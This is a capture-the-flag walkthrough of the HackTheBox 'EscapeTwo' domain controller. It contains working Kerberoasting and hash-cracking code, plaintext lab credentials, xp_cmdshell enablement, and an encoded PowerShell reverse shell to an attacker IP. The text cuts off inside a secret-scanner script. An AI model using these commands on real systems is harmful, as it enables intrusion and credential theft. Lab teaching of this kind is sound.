HackTheBox: EscapeTwo [Active Directory]

Table of Contents

[TOC]

Topic

Lab

Initial Enumeration

● Start Machine: 10.10.11.51

As is common in real life Windows pentests, you will start this box with credentials for the following account: rose / KxEPkKe6R8su

┌──(chw㉿CHW)-[~]
└─$ nmap -sC -sV -Pn 10.10.11.51
Nmap scan report for 10.10.11.51
Host is up (0.39s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-04-18 07:47:06Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after:  2025-06-08T17:35:00
|_ssl-date: 2025-04-18T07:48:35+00:00; -1s from scanner time.
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after:  2025-06-08T17:35:00
|_ssl-date: 2025-04-18T07:48:34+00:00; -2s from scanner time.
1433/tcp open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ssl-date: 2025-04-18T07:48:35+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-04-17T21:52:05
|_Not valid after:  2055-04-17T21:52:05
| ms-sql-info: 
|   10.10.11.51:1433: 
|     Version: 
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| ms-sql-ntlm-info: 
|   10.10.11.51:1433: 
|     Target_Name: SEQUEL
|     NetBIOS_Domain_Name: SEQUEL
|     NetBIOS_Computer_Name: DC01
|     DNS_Domain_Name: sequel.htb
|     DNS_Computer_Name: DC01.sequel.htb
|     DNS_Tree_Name: sequel.htb
|_    Product_Version: 10.0.17763
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-04-18T07:48:35+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after:  2025-06-08T17:35:00
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-04-18T07:48:34+00:00; -2s from scanner time.
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after:  2025-06-08T17:35:00
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-04-18T07:47:58
|_  start_date: N/A
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 126.75 seconds

Exposed services: DNS (53), Kerberos (88), MSRPC (135/593), SMB (139/445), LDAP and LDAPS including the Global Catalog ports (389/636/3268/3269), kpasswd (464), MSSQL 2019 RTM with no post-RTM patches (1433) and WinRM (5985). SMB signing is required.
The host is the domain controller DC01.sequel.htb for the sequel.htb domain.

Solution

1. Kerberoasting

The box provides a working set of credentials: rose / KxEPkKe6R8su

┌──(chw㉿CHW)-[~]
└─$ sudo impacket-GetUserSPNs -request -dc-ip 10.10.11.51 sequel.htb/rose    
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

Password:
ServicePrincipalName     Name     MemberOf                                              PasswordLastSet             LastLogon                   Delegation 
-----------------------  -------  ----------------------------------------------------  --------------------------  --------------------------  ----------
sequel.htb/sql_svc.DC01  sql_svc  CN=SQLRUserGroupSQLEXPRESS,CN=Users,DC=sequel,DC=htb  2024-06-09 03:58:42.689521  2025-05-06 11:01:23.377674             
sequel.htb/ca_svc.DC01   ca_svc   CN=Cert Publishers,CN=Users,DC=sequel,DC=htb          2025-05-06 16:02:28.965833  2025-05-06 12:40:01.700186     


[-] CCache file is not found. Skipping...
$krb5tgs$23$*sql_svc$SEQUEL.HTB$sequel.htb/sql_svc*$a2804f96060bd317c7ceb551bede5a42$...
$krb5tgs$23$*ca_svc$SEQUEL.HTB$sequel.htb/ca_svc*$2d99e251b2a4e1df55a4b89d72b41f19$...

Two SPN-bearing service accounts were found and a service ticket (TGS) requested for each: sql_svc and ca_svc. Both tickets came back as etype 23 (RC4-HMAC), the cheapest type to crack offline. Note that ca_svc is a member of Cert Publishers, which points at an AD CS deployment worth revisiting later.

Cracking the hashes offline

┌──(chw㉿CHW)-[~]
└─$ cat EscapeTwo.hash 
$krb5tgs$23$*sql_svc$SEQUEL.HTB$sequel.htb/sql_svc*$a2804f96060bd317c7ceb551bede5a42$...
$krb5tgs$23$*ca_svc$SEQUEL.HTB$sequel.htb/ca_svc*$2d99e251b2a4e1df55a4b89d72b41f19$...

┌──(chw㉿CHW)-[~]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt --rules=/usr/share/hashcat/rules/best64.rule EscapeTwo.hash
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
No "/usr/share/hashcat/rules/best64.rule" mode rules found in /etc/john/john.conf

Neither hash cracked. Note the warning above: john's --rules expects the name of a rule section defined in john.conf, not a path to a hashcat .rule file, so john aborted before trying any candidates. hashcat mode 13100 (Kerberos 5 TGS-REP etype 23) accepts hashcat rule files directly via -r, and a plain wordlist run with john would at least have been attempted. Either way, neither service account password is in rockyou, so the credentials have to come from somewhere else.
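To see what john and hashcat are actually doing with these two lines, here is a minimal etype-23 (RC4-HMAC) verifier written for this walkthrough; it is an added example, not code from the original writeup or from Impacket. Because the hashes above are redacted, it builds its own sample ticket (labelled constructed) with make_sample_tgs and then recovers the password from a tiny wordlist. The point it demonstrates: the ticket is encrypted under a key derived from the service account's password alone (the NT hash, MD4 over UTF-16LE, no salt), so each guess costs one MD4, three HMAC-MD5s and one RC4 pass, which is why Kerberoasting is a fast offline attack and why SPN accounts need long random passwords or gMSA.

```python
import hashlib
import hmac
import os
import re
import struct


def md4(data: bytes) -> bytes:
    """MD4 (RFC 1320) in pure Python; hashlib's md4 is often unavailable under OpenSSL 3."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", 8 * len(data))
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (  # (mixing function, additive constant, order of X[] indices, per-step shifts)
        (F, 0x00000000, range(16), (3, 7, 11, 19)),
        (G, 0x5A827999, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
        (H, 0x6ED9EBA1, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for fn, k, order, s in rounds:
            for i, idx in enumerate(order):
                a = rotl((a + fn(b, c, d) + X[idx] + k) & 0xFFFFFFFF, s[i % 4])
                a, b, c, d = d, a, b, c  # rotate so the next step updates the next register
        h = [(x + y) & 0xFFFFFFFF for x, y in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA), the cipher behind Kerberos etype 23."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def nt_hash(password: str) -> bytes:
    """The RC4-HMAC long-term key is just the NT hash: MD4 over UTF-16LE, no salt, no iteration."""
    return md4(password.encode("utf-16-le"))


TGS_RE = re.compile(r"^\$krb5tgs\$23\$\*([^$]+)\$([^$]+)\$([^*]+)\*\$([0-9a-f]{32})\$([0-9a-f]+)$", re.I)


def parse_krb5tgs(line: str) -> dict:
    """Split a GetUserSPNs / hashcat-style etype-23 line: the first 16 bytes after the SPN are the
    HMAC-MD5 checksum, the rest is the RC4-encrypted EncTicketPart."""
    m = TGS_RE.match(line.strip())
    if not m:
        raise ValueError("not a $krb5tgs$23$ line")
    user, realm, spn, checksum, edata = m.groups()
    return {"user": user, "realm": realm, "spn": spn,
            "checksum": bytes.fromhex(checksum), "edata": bytes.fromhex(edata)}


def tgs_password_matches(password: str, checksum: bytes, edata: bytes) -> bool:
    """RFC 4757 decrypt-and-verify for one guess: one MD4, three HMAC-MD5s and one RC4 pass."""
    k1 = hmac.new(nt_hash(password), struct.pack("<I", 2), hashlib.md5).digest()  # key usage 2: TGS ticket
    k3 = hmac.new(k1, checksum, hashlib.md5).digest()
    plaintext = rc4(k3, edata)  # 8-byte confounder || EncTicketPart
    return hmac.compare_digest(hmac.new(k1, plaintext, hashlib.md5).digest(), checksum)


def crack_tgs(line: str, wordlist):
    """Return the first wordlist entry that verifies against the ticket, or None."""
    t = parse_krb5tgs(line)
    for pw in wordlist:
        if tgs_password_matches(pw, t["checksum"], t["edata"]):
            return pw
    return None


def make_sample_tgs(password: str, user="sql_svc", realm="SEQUEL.HTB", spn="sequel.htb/sql_svc") -> str:
    """Constructed ticket for the demo: encrypt a fake EncTicketPart under the account key the way a KDC does."""
    k1 = hmac.new(nt_hash(password), struct.pack("<I", 2), hashlib.md5).digest()
    plaintext = os.urandom(8) + b"\x63\x82\x01\x00" + b"constructed EncTicketPart body"  # confounder + fake ASN.1
    checksum = hmac.new(k1, plaintext, hashlib.md5).digest()
    k3 = hmac.new(k1, checksum, hashlib.md5).digest()
    return f"$krb5tgs$23$*{user}${realm}${spn}*${checksum.hex()}${rc4(k3, plaintext).hex()}"


if __name__ == "__main__":
    sample = make_sample_tgs("Summer2024!")
    print(crack_tgs(sample, ["password", "Welcome1", "Summer2024!"]))
```

Feed a real line from GetUserSPNs to crack_tgs with a wordlist and it behaves like a (very slow) john; the production tools do the same arithmetic on GPUs, which is the whole threat model for SPN accounts with human-chosen passwords.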

2. LdapSearch

┌──(chw㉿CHW)-[~/Tools/impacket/examples]
└─$ impacket-ldapsearch -u rose -p 'KxEPkKe6R8su' -d sequel.htb -dc-ip 10.10.11.51 -l 10.10.11.51 -t all  

### Server infos ###
[+] Forest functionality level = Windows 2016
[+] Domain functionality level = Windows 2016
[+] Domain controller functionality level = Windows 2016
[+] rootDomainNamingContext = DC=sequel,DC=htb
[+] defaultNamingContext = DC=sequel,DC=htb
[+] ldapServiceName = sequel.htb:dc01$@SEQUEL.HTB
[+] naming_contexts = ['DC=sequel,DC=htb', 'CN=Configuration,DC=sequel,DC=htb', 'CN=Schema,CN=Configuration,DC=sequel,DC=htb', 'DC=DomainDnsZones,DC=sequel,DC=htb', 'DC=ForestDnsZones,DC=sequel,DC=htb']
### Result of "trusts" command ###
### Result of "pass-pols" command ###
[+] Default password policy:
[+] |__ Minimum password length = 7
[+] |__ Password complexity = Disabled
[*] |__ Lockout threshold = Disabled
[*] |__ Password history length = 24
[+] |__ Max password age = 42 days, 0 hours, 0 minutes, 0 seconds
[+] |__ Min password age = 24 hours, 0 minutes, 0 seconds
[+] No fine grained password policy found (high privileges are required).
### Result of "admins" command ###
[+] All members of group "Domain Admins":
[*]     Administrator (DONT_EXPIRE_PASSWORD)
[+] All members of group "Administrators":
[*]     Administrator (DONT_EXPIRE_PASSWORD)
[+] All members of group "Enterprise Admins":
[*]     Administrator (DONT_EXPIRE_PASSWORD)
### Result of "kerberoast" command ###
[*] ca_svc: sequel.htb/ca_svc.DC01
[*] sql_svc: sequel.htb/sql_svc.DC01
### Result of "asreqroast" command ###
### Result of "goldenticket" command ###
[+] krbtgt password changed at 2024-06-08 16:40:23

Password policy: minimum length 7, complexity disabled and, importantly, no lockout threshold, so password spraying against this domain will not lock accounts out.
Nothing else useful here.

3. Smbclient

┌──(chw㉿CHW)-[~]
└─$ smbclient -L //10.10.11.51 -U "rose"

Password for [WORKGROUP\rose]:

        Sharename       Type      Comment
        ---------       ----      -------
        Accounting Department Disk      
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        SYSVOL          Disk      Logon server share 
        Users           Disk      
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.51 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
  
┌──(chw㉿CHW)-[~]
└─$ smbclient //10.10.11.51/Users -U "rose"

Password for [WORKGROUP\rose]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                  DR        0  Sun Jun  9 09:42:11 2024
  ..                                 DR        0  Sun Jun  9 09:42:11 2024
  Default                           DHR        0  Sun Jun  9 07:17:29 2024
  desktop.ini                       AHS      174  Sat Sep 15 03:16:48 2018

                6367231 blocks of size 4096. 928252 blocks available
smb: \> 

┌──(chw㉿CHW)-[~]
└─$ smbclient //10.10.11.51/Accounting\ Department -U "rose"

Password for [WORKGROUP\rose]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun Jun  9 06:52:21 2024
  ..                                  D        0  Sun Jun  9 06:52:21 2024
  accounting_2024.xlsx                A    10217  Sun Jun  9 06:14:49 2024
  accounts.xlsx                       A     6780  Sun Jun  9 06:52:07 2024

                6367231 blocks of size 4096. 900385 blocks available
smb: \> 

SMB File Leak:

  • Users
    Default, desktop.ini
  • Accounting Department
    accounting_2024.xlsx, accounts.xlsx

Download the files

┌──(chw㉿CHW)-[~]
└─$ smbclient //10.10.11.51/Accounting\ Department -U "rose" -c "recurse ON; prompt OFF; mget *"
Password for [WORKGROUP\rose]:
getting file \accounting_2024.xlsx of size 10217 as accounting_2024.xlsx (4.9 KiloBytes/sec) (average 4.9 KiloBytes/sec)
getting file \accounts.xlsx of size 6780 as accounts.xlsx (6.3 KiloBytes/sec) (average 5.4 KiloBytes/sec)

┌──(chw㉿CHW)-[~]
└─$ smbclient //10.10.11.51/Users -U "rose" -c "recurse ON; prompt OFF; mget *"
Password for [WORKGROUP\rose]:
getting file \desktop.ini of size 174 as desktop.ini (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
getting file \Default\NTUSER.DAT of size 262144 as Default/NTUSER.DAT (59.7 KiloBytes/sec) (average 49.8 KiloBytes/sec)
getting file \Default\NTUSER.DAT.LOG1 of size 57344 as Default/NTUSER.DAT.LOG1 (48.7 KiloBytes/sec) (average 49.6 KiloBytes/sec)
getting file \Default\NTUSER.DAT.LOG2 of size 0 as Default/NTUSER.DAT.LOG2 (0.0 KiloBytes/sec) (average 44.2 KiloBytes/sec)
getting file \Default\NTUSER.DAT{1c3790b4-b8ad-11e8-aa21-e41d2d101530}.TM.blf of size 65536 as Default/NTUSER.DAT{1c3790b4-b8ad-11e8-aa21-e41d2d101530}.TM.blf (55.8 KiloBytes/sec) (average 45.9 KiloBytes/sec)
...

The downloaded accounting_2024.xlsx and accounts.xlsx are ZIP archives (Office Open XML), so they can be unpacked and their XML parts read directly without Excel.

accounts.xlsx holds credentials in xl/sharedStrings.xml (the table containing every text cell of the workbook). Cleaned up:

First Name Last Name Email Username Password

  • Angela Martin angela@sequel.htb angela 0fwz7Q4mSpurIt99
  • Oscar Martinez oscar@sequel.htb oscar 86LxLBMgEWaKUnBG
  • Kevin Malone kevin@sequel.htb kevin Md9Wlq1E5bZnVDVo
  • NULL sa@sequel.htb sa MSSQLP@ssw0rd!

3.1 Trying the credentials against SMB

┌──(chw㉿CHW)-[~]
└─$ cat EscapeTwo_name.txt                                                               
sa
angela
oscar
kevin
         
┌──(chw㉿CHW)-[~]
└─$ cat EscapeTwo_pwd.txt                                                                
MSSQLP@ssw0rd!
0fwz7Q4mSpurIt99
86LxLBMgEWaKUnBG
Md9Wlq1E5bZnVDVo

┌──(chw㉿CHW)-[~]
└─$ crackmapexec smb 10.10.11.51 -u EscapeTwo_name.txt -p EscapeTwo_pwd.txt
...
SMB         10.10.11.51     445    DC01             [-] Connection Error: The NETBIOS connection with the remote host timed out.
SMB         10.10.11.51     445    DC01             [-] sequel.htb\oscar:MSSQLP@ssw0rd! STATUS_LOGON_FAILURE 
SMB         10.10.11.51     445    DC01             [-] sequel.htb\oscar:0fwz7Q4mSpurIt99 STATUS_LOGON_FAILURE 
SMB         10.10.11.51     445    DC01             [+] sequel.htb\oscar:86LxLBMgEWaKUnBG

oscar:86LxLBMgEWaKUnBG authenticates to SMB. (The RID brute-force later confirms that angela and kevin are not domain accounts, and sa is a SQL login rather than a domain user.)

Enumerating the shares as oscar turned up nothing new.

3.2 Trying MSSQL

The same credentials tried against MSSQL: sa:MSSQLP@ssw0rd! logs in. sa is a SQL Server login, not a domain account, so the escapetwo.htb/ prefix in the connection string is irrelevant; impacket-mssqlclient uses SQL authentication unless -windows-auth is given.

┌──(chw㉿CHW)-[~]
└─$ impacket-mssqlclient 'escapetwo.htb/sa:MSSQLP@ssw0rd!@10.10.11.51'

Impacket v0.13.0.dev0+20250430.174957.756ca96e - Copyright Fortra, LLC and its affiliated companies 

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL (sa  dbo@master)> 

Attempting RCE through xp_cmdshell

SQL (sa  dbo@master)> EXEC xp_cmdshell 'whoami';
ERROR(DC01\SQLEXPRESS): Line 1: SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.
SQL (sa  dbo@master)> EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
INFO(DC01\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
SQL (sa  dbo@master)> EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
INFO(DC01\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (sa  dbo@master)> EXEC xp_cmdshell 'whoami';
output           
--------------   
sequel\sql_svc   

NULL             

SQL (sa  dbo@master)> 
  1. SQL Server ships with xp_cmdshell disabled.
  2. sp_configure reads or sets server-level options. show advanced options (default 0) gates access to the advanced settings; setting it to 1 and running RECONFIGURE makes SQL Server apply the change.
  3. EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
     With advanced options exposed, the same call turns xp_cmdshell on (set to 1) and RECONFIGURE applies it. Enabling it requires the sysadmin role, which sa has.

Command execution through SQL Server works, and it runs as the SQL Server service account, which is why whoami returns sequel\sql_svc. 🥚 The catch: xp_cmdshell gets switched back off after a few minutes.
👉🏻 Use the window to get a reverse shell instead.

4. Reverse shell through MSSQL

Following the hackingarticles guide on getting a reverse shell from MSSQL. The Windows payload (a base64-encoded PowerShell TCP client connecting back to the attacker's 10.10.14.179:8888) was generated with Reverse Shell Generator.

SQL (sa  dbo@master)> EXEC xp_cmdshell 'powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMQA3ADkAIgAsADgAOAA4ADgAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdA

Start the listener

┌──(chw㉿CHW)-[~]
└─$ nc -nvlp 8888 

Reverse shell received

┌──(chw㉿CHW)-[~]
└─$ nc -nvlp 8888   
listening on [any] 8888 ...
connect to [10.10.14.179] from (UNKNOWN) [10.10.11.51] 49199
PS C:\Windows\system32> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State   
============================= ============================== ========
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled 
SeCreateGlobalPrivilege       Create global objects          Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
PS C:\Windows\system32> whoami
sequel\sql_svc
PS C:\Windows\system32> 

4.1 Check local group membership

PS C:\Windows\system32> net localgroup administrators
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
Domain Admins
Enterprise Admins
The command completed successfully.

No such luck 🥶

4.2 Hunting for credentials / passwords

PS C:\Windows\system32> Get-ChildItem -Recurse -Path C:\Users -Include *.xml,*.ini,*.txt,*.config -ErrorAction SilentlyContinue
PS C:\Windows\system32> Get-ChildItem -Recurse -Path C:\ -Include *.xml,*.ini,*.txt,*.config -ErrorAction SilentlyContinue
...
    Directory: C:\Program Files\Microsoft SQL Server\150\DTS\Binn


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-a----        9/24/2019   2:40 PM           1898 DTExec.exe.config                                                     
-a----        9/24/2019   2:40 PM           1898 dtshost.exe.config                                                    
-a----        9/24/2019   2:40 PM           4470 DTSPERF.INI                                                           
-a----        9/24/2019   2:40 PM           1898 DTSWizard.exe.config                                                  
-a----        9/24/2019   2:40 PM           1898 DTUtil.exe.config                                                     
-a----        9/24/2019   2:40 PM          71494 DtwTypeConversion.xml                                                 


    Directory: C:\Program Files\Microsoft SQL Server\150\DTS\Connections\en


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-a----        9/24/2019   2:40 PM          22303 Microsoft.SqlServer.ManagedConnections.xml
...

    Directory: C:\Program Files (x86)\Microsoft SQL Server Management Studio 20\Common7\IDE\SqlToolsData\1033


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-a----        1/31/2024   3:21 AM          41535 MDXFunctions.xml                                                      
-a----        1/31/2024   3:21 AM         134188 MDXTemplates.xml                                                      
-a----         4/3/2024   3:48 PM           6177 OleSqlCommands.xml                                                    
-a----         4/3/2024   3:48 PM          95504 SqlCommonObjects.xml                                                  
-a----         4/3/2024   3:48 PM            619 SqlProductions.xml                                                    
-a----         4/3/2024   3:48 PM          15539 SqlTemplateData.xml                                                   
-a----         4/3/2024   3:48 PM         609757 StoredProcedures.xml
...
    Directory: C:\SQL2019\ExpressAdv_ENU\1033_ENU_LP


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-a----        9/24/2019   5:57 PM            207 MEDIAINFO.XML                                                         


    Directory: C:\SQL2019\ExpressAdv_ENU\x64


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-a----        9/24/2019   5:20 PM          12028 ADDNODE.XML                                                           
-a----        9/24/2019   5:20 PM          11893 COMPLETECLUSTERWIZARD.XML                                             
-a----        9/24/2019   5:20 PM          15305 COMPLETEIMAGEWIZARD.XML                                               
-a----        9/24/2019   5:20 PM           3061 COMPONENTUPDATE.XML                                                   
-a----        9/24/2019   5:20 PM           5673 EDITIONUPGRADEWIZARD.XML                                              
-a----        9/24/2019   5:20 PM            486 FIXSQLREGISTRYKEY_X64.EXE.CONFIG                                      
-a----        9/24/2019   5:20 PM            486 FIXSQLREGISTRYKEY_X86.EXE.CONFIG                                      
-a----        9/24/2019   5:20 PM          19950 INSTALLCLUSTERWIZARD.XML                                              
-a----        9/24/2019   5:20 PM          20522 INSTALLWIZARD.XML                                                     
-a----        9/24/2019   5:20 PM            486 LANDINGPAGE.EXE.CONFIG                                                
-a----        9/24/2019   5:20 PM          92538 PIDPRIVATECONFIGOBJECTMAPS.XML                                        
-a----        9/24/2019   5:20 PM          13679 PREPARECLUSTERWIZARD.XML                                              
-a----        9/24/2019   5:20 PM           8698 PREPAREIMAGEWIZARD.XML                                                
-a----        9/24/2019   5:20 PM           4946 REMOVENODE.XML                                                        
-a----        9/24/2019   5:20 PM           6999 REPAIRWIZARD.XML                                                      
-a----        9/24/2019   5:20 PM           1403 RUNRULESUI.XML                                                        
-a----        9/24/2019   5:20 PM            486 SCENARIOENGINE.EXE.CONFIG                                             
-a----        9/24/2019   5:20 PM           4648 UNINSTALLWIZARD.XML                                                   
-a----        9/24/2019   5:20 PM          14573 UPGRADEWIZARD.XML                                                     


    Directory: C:\SQL2019\ExpressAdv_ENU


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-a----        9/24/2019  10:03 PM            788 MEDIAINFO.XML                                                         
-a----        9/24/2019  10:03 PM            486 SETUP.EXE.CONFIG                                                      
-a----         6/8/2024   3:07 PM            717 sql-Configuration.INI                                                 
...

Far too many hits; skipping system configuration, Bootstrap, binaries and the like.

🕛🕧🕐🕜🕑🕝🕒⏰...
C:\SQL2019\ExpressAdv_ENU\sql-Configuration.INI is the unattended-install answer file for SQL Server, left behind from the installation.
It contains useful information:

PS C:\Windows\system32> type C:\SQL2019\ExpressAdv_ENU\sql-Configuration.INI
[OPTIONS]
ACTION="Install"
QUIET="True"
FEATURES=SQL
INSTANCENAME="SQLEXPRESS"
INSTANCEID="SQLEXPRESS"
RSSVCACCOUNT="NT Service\ReportServer$SQLEXPRESS"
AGTSVCACCOUNT="NT AUTHORITY\NETWORK SERVICE"
AGTSVCSTARTUPTYPE="Manual"
COMMFABRICPORT="0"
COMMFABRICNETWORKLEVEL=""0"
COMMFABRICENCRYPTION="0"
MATRIXCMBRICKCOMMPORT="0"
SQLSVCSTARTUPTYPE="Automatic"
FILESTREAMLEVEL="0"
ENABLERANU="False" 
SQLCOLLATION="SQL_Latin1_General_CP1_CI_AS"
SQLSVCACCOUNT="SEQUEL\sql_svc"
SQLSVCPASSWORD="WqSZAF6CysD*****"
SQLSYSADMINACCOUNTS="SEQUEL\Administrator"
SECURITYMODE="SQL"
SAPWD="MSSQLP@ssw0rd!"
ADDCURRENTUSERASSQLADMIN="False"
TCPENABLED="1"
NPENABLED="1"
BROWSERSVCSTARTUPTYPE="Automatic"
IAcceptSQLServerLicenseTerms=True

SEQUEL\sql_svc : WqSZAF6CysD***** (service account password, in plaintext in the install answer file)
sa : MSSQLP@ssw0rd! (already known)
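Scrolling through every *.xml/*.ini/*.config hit, as above, is slow; a practitioner filters on content rather than extension. The scanner below is an added example (not from the writeup): it parses INI files with configparser and XML/.config files with ElementTree and reports keys that look like secrets, including Password= buried inside .NET connection strings. The two sample files are constructed, with invented values modelled on sql-Configuration.INI and a typical web.config, and the paths are placeholders.

```python
import configparser
import re
import xml.etree.ElementTree as ET

# Key names that usually carry a secret. Anchored so SECURITYMODE or SQLSVCSTARTUPTYPE do not match.
SECRET_KEY = re.compile(r"pass(word|wd)?$|pwd$|secret|token|connectionstring", re.I)
# Password=... or Pwd=... inside a semicolon-separated connection string.
CONNSTR_PW = re.compile(r"(?:password|pwd)\s*=\s*([^;]+)", re.I)

# Constructed samples modelled on the files found above; every value here is invented.
SAMPLE_INI = """[OPTIONS]
ACTION="Install"
INSTANCENAME="SQLEXPRESS"
SQLSVCACCOUNT="SEQUEL\\sql_svc"
SQLSVCPASSWORD="Example-Svc-Pw-1"
SQLSVCSTARTUPTYPE="Automatic"
SECURITYMODE="SQL"
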